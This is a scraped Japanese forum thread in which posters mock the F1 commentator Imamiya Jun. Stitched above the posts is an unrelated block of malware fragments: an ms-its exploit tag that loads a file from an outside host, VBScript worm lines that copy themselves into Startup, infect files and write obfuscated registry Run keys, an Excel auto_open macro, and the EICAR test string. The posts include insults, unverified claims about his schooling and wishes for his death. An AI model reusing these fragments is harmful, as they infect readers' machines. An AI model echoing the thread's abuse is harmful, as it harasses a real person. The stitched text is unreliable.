<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

124 :音速の名無しさん:2006/12/09(土) 17:40:10 ID:zu7WNopu0
>>123
良スレ認定乙。

125 :音速の名無しさん:2006/12/09(土) 20:17:14 ID:x4jaUqrlO
さらしあげ

126 :音速の名無しさん:2006/12/10(日) 02:03:09 ID:A6RjIQHT0
>>119



馬鹿乙

127 :音速の名無しさん:2006/12/12(火) 17:08:49 ID:wPY7a5110
マッチさんと比較するのはマッチさんに失礼なので永井君と比較するが、
他人の話に割り込んだりかぶせたりしない分だけ、 永井君の方がマシだな 。
耳糞と歯糞どっちか食べろと言われてる気分だけど。


128 :音速の名無しさん:2006/12/12(火) 17:17:43 ID:qx8MtVDF0
嫌なら直接言えよw


129 :音速の名無しさん:2006/12/12(火) 18:08:37 ID:wPY7a5110
書き込んで読み直したら、永井君に気の毒な比較になってしまったようだな。

130 :音速の名無しさん:2006/12/14(木) 16:56:03 ID:CuflmdYw0
今宮さんは歯糞か…

131 :音速の名無しさん:2006/12/15(金) 05:27:22 ID:lUgIxfhL0
今宮と比べるなんて、耳糞・歯糞に失礼だ。

謝れ!

132 :音速の名無しさん:2006/12/15(金) 19:59:20 ID:4WpgPZDSO
昔アイルトンセナもやったんですよ!。

133 :音速の名無しさん:2006/12/16(土) 10:43:40 ID:BL51kthV0





来年はさすがにやらないだろw





プロの中に素人が一人混ざっている今の解説陣状況を理解しろw




134 :音速の名無しさん:2006/12/16(土) 11:02:25 ID:4DX6KtsB0


なんだ? プロって?

135 :音速の名無しさん:2006/12/16(土) 13:12:59 ID:6Pp1CrbQ0
競馬の神様と言われた大川慶次郎さんは、不勉強なスポーツ紙記者たちに
「生物学を修めてこいとまでは言わないが、馬の見方ぐらいは勉強してから来い」
と言い続けていた。

競馬解説者といっても、人の子だから、そういつも当たるわけではない。
その人の予想に乗っかって大損する人も必ずいる。
だからこそ大川さんは、誰にも負けじと馬を見続けた。

大川さんは、タブーとされている業界内部への批判も辞さなかった。
しかし、敢えてタブーに踏み込んでも、村社会から消されずにいられたのは、
氏の類い希なる馬への熱意と、それに説得力を持たせた氏の説得力にあった。

プロってのは、こういう人のことを言うんだよ。

今宮もよ、自動車工学を修めろとは言わんが、もうちょっと車のこと勉強しろや。
まぁもう脳味噌の発達が止まる年齢だから時既に遅いな。いさぎよく辞めろや。

136 :音速の名無しさん:2006/12/16(土) 17:17:15 ID:rUYQ2pvu0
競馬の話はいい話だな。

英語も使えない香具師がグダグダ仕事で解説席に居座り続けるってのは
日本のモタスポのお寒い状況の象徴なんだよな、まったく。

137 :音速の名無しさん:2006/12/16(土) 22:56:55 ID:4DX6KtsB0
>>135
すげえんだなプロって!

おら競馬に全く関心がない

138 :音速の名無しさん:2006/12/17(日) 11:02:23 ID:0/hG3mrC0




【IT】『もう気象予報士は必要ありません』 IBMが天気予想システム「ディープサンダー」を開発[2006/12/15]
http://news18.2ch.net/test/read.cgi/bizplus/1166298508/l50



今宮終わったなw













139 :音速の名無しさん:2006/12/17(日) 14:15:32 ID:hsL0LihM0
つーか、今でも今宮はFIA発表の天候・気温を読んでるだけだから

140 :音速の名無しさん:2006/12/17(日) 15:02:06 ID:BNypGBj00
いてもいいけど、放送の邪魔すんなよ今宮は

141 :音速の名無しさん:2006/12/17(日) 20:22:53 ID:0/hG3mrC0



今宮が居るとレースに集中できないw






142 :音速の名無しさん:2006/12/18(月) 01:00:25 ID:IXTVc9OLO
今宮ぁ!早く辞めろ!

お前ほんと邪魔だよ!引退しろ!

お前みたいな奴が老害って言うんだよ!

143 :音速の名無しさん:2006/12/18(月) 05:40:31 ID:MKR1xeaQ0
老いる前から能無しですが・・・・

144 :音速の名無しさん:2006/12/18(月) 16:06:28 ID:IXTVc9OLO
今宮って中卒なの?

英語できないし日本語下手だし…

人の話は聞かないし、人の話は折るし、さっき誰かが話た内容を繰り返し知ったげ話すだけ
中卒は土いじる仕事か荷物を運ぶ仕事が良いと思うけど

145 :音速の名無しさん:2006/12/18(月) 16:21:31 ID:1nZ6uvB80
慶応卒じゃなかったけ?

146 :音速の名無しさん:2006/12/18(月) 22:21:31 ID:pRNJat8h0


慶応在学中から親の金で海外に遊びに出かける(本人は海外レース取材と言い張っているがw)
金がなくなって日本に帰ってくるとASに脳内電波投稿を繰り返す(本人は特派員レポートと称するw)
遊び呆けていたツケが単位不足になり中退(本人はモータースポーツジャーナリストデビューと言い張るw)



147 :音速の名無しさん:2006/12/18(月) 22:28:57 ID:1nZ6uvB80
なんだよ中退かよw
しかし慶応入る学力は持っていたんだな

148 :音速の名無しさん:2006/12/18(月) 22:40:41 ID:pRNJat8h0


幼稚舎からのエスカレーターだったはずw
付属からはよほどのバカか不良でない限り入学できる
ただし学部は選べないけどw


149 :音速の名無しさん:2006/12/18(月) 22:58:47 ID:1nZ6uvB80
>>148
さらになんだよw
しかしぶるじょわ育ちだったんだな

150 :音速の名無しさん:2006/12/18(月) 23:31:58 ID:QQqiy7dy0
だよ、弟は若いのにカートショップ経営だしね

151 :音速の名無しさん:2006/12/19(火) 10:34:20 ID:bdGlfe+l0
慶應義塾大学文学部図書館情報学科卒業

http://ja.wikipedia.org/wiki/%E4%BB%8A%E5%AE%AE%E7%B4%94

152 :音速の名無しさん:2006/12/20(水) 03:17:42 ID:5yoIQ7GoO
今週のレジェンドからセナが出てきますが、それでもF1は続いていくわけです。ハイ。

153 :音速の名無しさん:2006/12/20(水) 12:11:44 ID:Vo4mTMs8O
>>149
なんちゃってブルジョワで実はプロレタリアートでつ。

154 :音速の名無しさん:2006/12/20(水) 19:01:53 ID:XPAYR0eh0



wikはなんで卒業になってるの?ひょっとして学歴詐称ですか?

155 :音速の名無しさん:2006/12/20(水) 19:47:33 ID:r1/YLy4G0
>>154
書いたのが信者だから。

156 :音速の名無しさん:2006/12/20(水) 23:49:45 ID:Vw51JyfZ0
的確且つ長年の取材経験から来る回答・解説は絶品

こんなこと信者か本人しか書かないだろうな

157 :音速の名無しさん:2006/12/20(水) 23:58:25 ID:5/jgzkOs0
wiki見てきた。すごいな!基本のところはまさに信者が書いた文だね

158 :音速の名無しさん:2006/12/21(木) 11:46:57 ID:nMQaXjue0
これだからwikiは信用ならん

159 :音速の名無しさん:2006/12/21(木) 19:27:50 ID:wDcim4yGO
2chが真実を伝えているってのも変な話だw

160 :音速の名無しさん:2006/12/21(木) 23:32:02 ID:fKHNmeZV0



ファンタジー北岡もwikiにデタラメ書かれていたな


鈍の場合カーグラに投稿じゃなくて嘔吐スポーツに読者投稿していただけだろ


161 :音速の名無しさん:2006/12/22(金) 00:05:11 ID:9sXIJhgN0
CGでも地方レース(巻末のちっさいヤツね)のレポートをたまに請け負ってたよ

162 :音速の名無しさん:2006/12/22(金) 00:42:11 ID:7gAqYNxS0
でたらめはそんなに無いにしても、wikiの文章は痛すぎだな。
事実を客観的かつ簡潔に記すべきところを、やたら書き手の主観と思い入れが目につく。
ま、ある意味鈍には相応しい駄文ともいえるな。
モタスポに限らず、お涙頂戴が好きな奴って多いからね。

163 :音速の名無しさん:2006/12/22(金) 00:51:46 ID:ki/A8Mou0
>>162
川井と熊さんに敵意むき出しだもんね。ここと似てるけどw

164 :音速の名無しさん:2006/12/22(金) 10:13:47 ID:gNXehOeT0
訂正するから、誰か校正版ここにUPしてよ。

165 :音速の名無しさん:2006/12/22(金) 11:45:21 ID:pdZZ0KS+0
>>164
だから2ちゃんの情報載せるなって
ここも2ちゃんだろが

166 :音速の名無しさん:2006/12/22(金) 23:51:23 ID:7EV6+wOW0
>図書館情報学科卒業


他人の受け売りだけが取り柄の芸風はこれが起源だったのねw


167 :音速の名無しさん:2006/12/23(土) 03:00:46 ID:2mDDfq+p0
今宮さんは、鈴鹿で鼻くそほじってるとこ、
写真に撮られちゃったからなw

168 :音速の名無しさん:2006/12/23(土) 03:05:49 ID:gydxCDIe0
鈍それ自体が鼻くそみたいなもんだしな

169 :音速の名無しさん:2006/12/23(土) 03:24:52 ID:p08MlzzPO
ロンデニス、来たぞチャンスが。

170 :音速の名無しさん:2006/12/23(土) 04:54:22 ID:DK+IJHrV0
来季開幕までに死ねばいいのに

171 :音速の名無しさん:2006/12/23(土) 12:57:42 ID:7oa2InNkO
今宮なんぞとっくに終わったヤツ

172 :音速の名無しさん:2006/12/23(土) 13:46:54 ID:Si685n3W0
ありゃ始まってもいないよ

173 :音速の名無しさん:2006/12/23(土) 22:20:29 ID:deBSQNR/0
じゃあ今後の成長に期待って事だねw

174 :音速の名無しさん:2006/12/23(土) 22:50:59 ID:XoX0SzsD0
>>172
安易に反意レス慣れすぎてるお前のレスがヤバい
何ていうこと言ってしまったんだ?
みんな空気読むガマンていうか楽スルーできてたのに・・


175 :音速の名無しさん:2006/12/23(土) 23:13:58 ID:IqyywHjV0


鈍の実況が無い総集編が一番楽しめる






176 :音速の名無しさん:2006/12/24(日) 16:48:46 ID:j22mNgUNO
00豪州
「フェラーリジョーダン、フェラーリジョーダン」

177 :音速の名無しさん:2007/01/03(水) 15:30:47 ID:tzXBwUde0
今宮純=ウンコ製造機

178 :音速の名無しさん:2007/01/04(木) 03:53:19 ID:cNWSWS8x0
ウンコに失礼だ。あやまれ。

179 :音速の名無しさん:2007/01/04(木) 14:19:04 ID:KjxzDGxL0
もう今年はCSには出ないよね?

あれだけ地上波歓迎論出てたんだからさ。

頼みますよ。



180 :音速の名無しさん:2007/01/04(木) 23:27:53 ID:aIIwst9Y0
痴情派もいりません、来ないでください

181 :音速の名無しさん:2007/01/04(木) 23:55:43 ID:mCUsxPHZ0
↑中二病ww

182 :音速の名無しさん:2007/01/05(金) 10:59:50 ID:JoFyYQL90
いや、地上波大歓迎です!

是非地上波へ!!!!!!!!!!!!!!

183 :音速の名無しさん:2007/01/06(土) 09:52:55 ID:usMQ31pdO
こんなキモヲタは今宮さえ見れりゃどこだって歓迎

184 :音速の名無しさん:2007/01/06(土) 14:45:19 ID:tZ0Bvz+30
中二病って知らなかったけど、今宮純さんのことだろ?

185 :音速の名無しさん:2007/01/07(日) 16:09:42 ID:bkLCOQHV0
>中二病
世間知らずという意味ではそうかもね。
関係者との接触がほとんどなさそう。
タクマ情報でさえ嫁経由なのではないかな。

186 :音速の名無しさん:2007/01/08(月) 22:14:01 ID:NnejTxmU0
とにかくもう解説(らしきもの)の地位から降りてくれ今宮

187 :音速の名無しさん:2007/01/09(火) 12:45:37 ID:cfYdRPSV0
お願い。

コースサイドウォッチャーに徹して下さい。



188 :音速の名無しさん:2007/01/09(火) 16:38:34 ID:Tt8E36krO
ぁたしからもぉ願ぃね(-人-)

189 :音速の名無しさん:2007/01/10(水) 03:02:30 ID:Okt0duNe0
>>102
馬鹿乙 

190 :音速の名無しさん:2007/01/10(水) 07:47:43 ID:6jQEYScO0
くぁwせdrftgyふじこl

191 :音速の名無しさん:2007/01/10(水) 15:44:53 ID:fvj5BQdW0
今宮さんもういいよ

192 :音速の名無しさん:2007/01/10(水) 16:25:26 ID:4ecAwTRe0
団塊世代。

常に邪魔する団塊世代。

いつまでも続くよ、団塊支配。

193 :音速の名無しさん:2007/01/10(水) 18:06:04 ID:XKjoedwy0
おまいらもうあきらめろ
長生き今宮は延々続くって

194 :音速の名無しさん:2007/01/10(水) 21:54:01 ID:QIx9u/sr0
あの惨状をオクサンは同業者としてどう見ているんだろう。

195 :音速の名無しさん:2007/01/11(木) 12:44:31 ID:7Rm+Ya+eO
人柄だけでもってる。あとはなんにもない。

196 :音速の名無しさん:2007/01/11(木) 13:09:01 ID:Pn3NJJ700
人柄?人を鼻で笑うようなあの性格がか?昔から人望ないよ。

197 :音速の名無しさん:2007/01/19(金) 00:22:39 ID:/0qniLfC0
           ________
      ,. ::'"´ ̄::::::::::::: ̄`゛'ヽ、     
      /::::::::::::::::::::::::::::::::::::::::::::::::::\.
    ,':::::::::;:::::::::::::::::::::::::::::::::::::::::::::::::::::ヽ,     
   ./::::/:::::/::::::/___/:::::::/::i::::::::::i:::::::',   ベストベスト>
  /:::/:::::::/::::::://:::__/:::::::/::/i:::L__::i:::::::::|      ┌─┬─────
  /:::イ::::::/:::::::::/rィて`'!ヽ!::/ |::::i__::::i:::::::::|       |  |\
. /:::::::i::::::i:::::::::/ ハ   リ   L,イ''ト,/|::::i::|..     |  |  \
,':::::::::::L_::!::ハ::::」 ゝー゛     トソハ/::::!:」 . .     |  |   \__    
::::::::::::::::/::::::/|:::| ""       、 ` ,,|::|::|.       |  |    |
::::::::::::::::::::::/::|::::|     、_____    !::::|         |  |    |
:::::::::::::::::::/::::|:::::ト、     || ||「´ ,.イ::::|        |  |    |
::::::::/::::::/::;__|::,!へヽ.、   || ll|,.イ:|::|:::::| ズゾー  |  |    |
:::::;':::::::::,. '" く \\   r| ||ト、:|:::|::|::::|       |  |    |
:::/:::::/ ⌒ヽ/⌒ヽ.\_T.|| l| !:::|::|::::| (   ) .  |  |    |
/:::::/  __,,./ 、 \`ヽ,\ ||| |イヽ|/::           |  |    |
:::;:イ // / ヽ、\ノ、ノ\\ |   i:::(  )     |  |    |
:/ !/   ト、 ヽ、ソ!「L___\|\>  ( )        .|  |    |__
ハ     ト、`'´ ,l | く__,/ ||| |〉 (^ヽ、ヽ,        |  |   /
:::ゝ、   ヽ  ̄7 / 「二二二二二i ヽ, |.       |  | /
::::/::::::::>、___二_レ'  i緑のたぬき/  i .|     └┴┴┬───
::::::::::::〈   /     ヽ、二二二/  ノイ.ソ   ,.p_.       r|
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄(:::::::) ̄「 ̄ ̄ ̄ ̄ ̄ ̄

198 :音速の名無しさん:2007/01/19(金) 01:30:26 ID:ClXKaK1Q0
>>197 キモ馬鹿乙

199 :音速の名無しさん:2007/01/19(金) 23:06:15 ID:luA5IiD00
引退してちょ

200 :音速の名無しさん:2007/01/20(土) 21:32:59 ID:jbvZ3CNI0
引退まだ?

201 :音速の名無しさん:2007/01/20(土) 22:47:34 ID:o8Jb3ngf0
「フンッ」
鼻で笑っているように聞こえるが、実は鼻毛を抜くときりきんでいるのだ。
コースサイドに佇むことの多い今宮氏は鼻毛が伸びやすい。
金曜日・土曜日とコースサイドに立ちっぱなしだから日曜日は疲労がピークとなり、
「レースに集中しましょう」と言ったそばから眠ってしまう。
これではいかんとばかりに眠気を振り払おうと鼻毛を抜くが、
あまりの痛さに「フンッ」と声を発してしまう。


        …んなわけねーだろ!

202 :音速の名無しさん:2007/01/21(日) 02:01:15 ID:Ux5xsGlN0
>>201
長文馬鹿 乙

203 :音速の名無しさん:2007/01/21(日) 09:05:17 ID:Pzfc+cN/0
>>202
今宮 zzz・・・

204 :音速の名無しさん:2007/01/25(木) 14:20:38 ID:ilp1v2CF0
卒業ですか

205 :音速の名無しさん:2007/01/25(木) 14:58:11 ID:QzkNvpqR0
ずっと疑問だったんだが
今宮さんって英語喋れるのか?
奥さん喋れるのは知ってる
誰かのインタビューを英語でやってたの
チラッと見たことあるから。
今宮さんが喋ってるとこ見たことないぞ。

206 :音速の名無しさん:2007/01/25(木) 15:36:04 ID:KAxnJ+4FO
>>205

ネタですか?

207 :音速の名無しさん:2007/01/25(木) 16:28:15 ID:ilp1v2CF0
おつかれちゃん

208 :音速の名無しさん:2007/01/25(木) 20:13:59 ID:pgOiuXcBO
2989 2989ですね。

209 :音速の名無しさん:2007/01/25(木) 21:07:24 ID:E1k1xaeH0
2323だもんな

210 :音速の名無しさん:2007/01/27(土) 08:00:06 ID:e1TIPgkl0
今宮は日本語が不自由

211 :音速の名無しさん:2007/01/27(土) 15:46:16 ID:dlL77PSo0











それでも「解説」は続くんです。はい。

212 :音速の名無しさん:2007/01/28(日) 22:01:49 ID:3xdc2MAQ0
↑ スペース開けるときはもっと洒落たこと書けよ
もったいぶってる割りにつまらん。

213 :音速の名無しさん:2007/01/29(月) 12:32:58 ID:i9g3QXhX0
オフの取材とかしてんのかねこの人

214 :音速の名無しさん:2007/01/30(火) 12:27:58 ID:b0kZ6MoA0
マンセー板dat墜ちw

215 :音速の名無しさん:2007/01/30(火) 13:29:14 ID:WfwCBcmy0
ワラワラ

216 :音速の名無しさん:2007/01/30(火) 16:01:15 ID:nr7lQpN00
>>214
じゃあスレ立ててくれ

217 :音速の名無しさん:2007/01/30(火) 20:18:49 ID:nr7lQpN00
てうか今宮スレなんてヲタもアンチでも同スレいいだろ
仲良くケンカしながらやっていけばいい

218 :音速の名無しさん:2007/01/30(火) 21:20:36 ID:qclHBgU80
「今宮純マンセースレッド」

誰だよこれ立てた厨www

219 :音速の名無しさん:2007/01/30(火) 22:38:26 ID:RehLrKrk0
今宮純dat墜ち

220 :音速の名無しさん:2007/01/31(水) 11:14:31 ID:l7vWzr9l0
「いや、これはひどいな。やり直しですね・・・」

221 :音速の名無しさん:2007/02/02(金) 00:54:19 ID:GsQXe1hUO
やったアレジ!あーアレジ負けた。

222 :音速の名無しさん:2007/02/02(金) 04:39:56 ID:ynDbJC3A0
LEGENDSのビデオ見てるんだが、84ブラジルGPで、今宮のアホが、

「水タンクの水を、エンジンのピストンの内部に噴射して、冷却しています」

などと無茶苦茶なこと言ってる。内燃機関の基本も知らんと、
よう自動車レースの「解説」なんかやるもんや。

デーブ大久保とか、アホの川藤でも、野球のルールくらいは知ってる。
今宮は、それ以下や。

エスノーについてのトークでも、

「視聴者の方にはあまり馴染みのない名前でしょうけど」

とか、冒頭で偉そうにのたまうくせに、エスノーについては語るふりして
いつのまにか、ベルガーがどうのこうの、ストレイフが、アリオーが、と
固有名詞を羅列してごまかしよった。

知らんなら「知らん」と正直に言え。

なにが「解説者」や。死ね、詐欺師。

223 :音速の名無しさん:2007/02/02(金) 05:47:44 ID:9B7Aeat20
シリンダーの内部に水を噴射して気化熱で冷却するのは一般的な手段だがな

224 :音速の名無しさん:2007/02/02(金) 18:24:31 ID:h3iTqdrx0
「ピストンの内部に噴射」じゃ、突っ込まれるわな。

225 :音速の名無しさん:2007/02/03(土) 16:30:33 ID:SG83IX7s0
「ピストンしながら発射」にしとけば突っ込まれなかったのにな

226 :音速の名無しさん:2007/02/03(土) 17:00:58 ID:FBjnKdt10
もう引退するんでしょ、そっとしておいてやれよ。

227 :音速の名無しさん:2007/02/03(土) 19:05:41 ID:arquOPBr0
>>225
気持ち良さそうだな

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)